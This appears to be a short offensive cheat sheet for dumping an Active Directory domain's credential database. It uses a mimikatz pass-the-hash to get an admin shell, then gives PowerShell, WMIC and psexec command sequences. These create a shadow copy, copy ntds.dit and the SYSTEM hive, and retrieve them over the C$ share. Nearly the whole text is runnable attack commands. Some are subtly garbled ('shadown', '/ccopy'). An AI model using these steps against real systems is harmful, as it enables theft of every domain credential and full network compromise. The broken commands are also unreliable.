If you have a hash for either a domain admin or a local admin on a domain controller, you can use mimikatz to exfil the entire Active Directory database.
From mimikatz, run the following command to spawn a shell as the target user:
sekurlsa::pth /user:<username> /domain:<domainname> /ntlm:<hash> /run:cmd.exe
Now you have a few options from the new cmd window. For example:
Using powershell
winrm set winrm/config/client ‘@{TrustedHosts=”<computer_name>”}’
Enter-PSSession -ComputerName <computer_name>
vssadmin create shadown /for=c:
mkdir c:\1
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyX\windows\ntds\ntds.dit c:\1
reg save hklm\system c:\1
(HarddiskVolumeShadowCopyX is the shadow copy created by vssadmin)
Using wmic
WMIC /node:”<computer_name>” process call create “cmd.exe /c vssadmin create shadown /for=c:”
WMIC /node:”<computer_name>” process call create “cmd.exe /c mkdir c:\1″
WMIC /node:”<computer_name>” process call create “cmd.exe /ccopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyX\windows\ntds\ntds.dit c:\1”
WMIC /node:”<computer_name>” process call create “cmd.exe /c reg save hklm\system c:\1”
Using psexec
psexec \\<computer_name> vssadmin create shadow /for=c:
psexec \\<computer_name> cmd /c mkdir c:\1
psexec \\<computer_name> cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyX\windows\ntds\ntds.dit c:\1
psexec \\<computer_name> cmd /c reg save hklm\system c:\1
Access the C$ share on the remote machine, retrieve the file and delete the staging folder.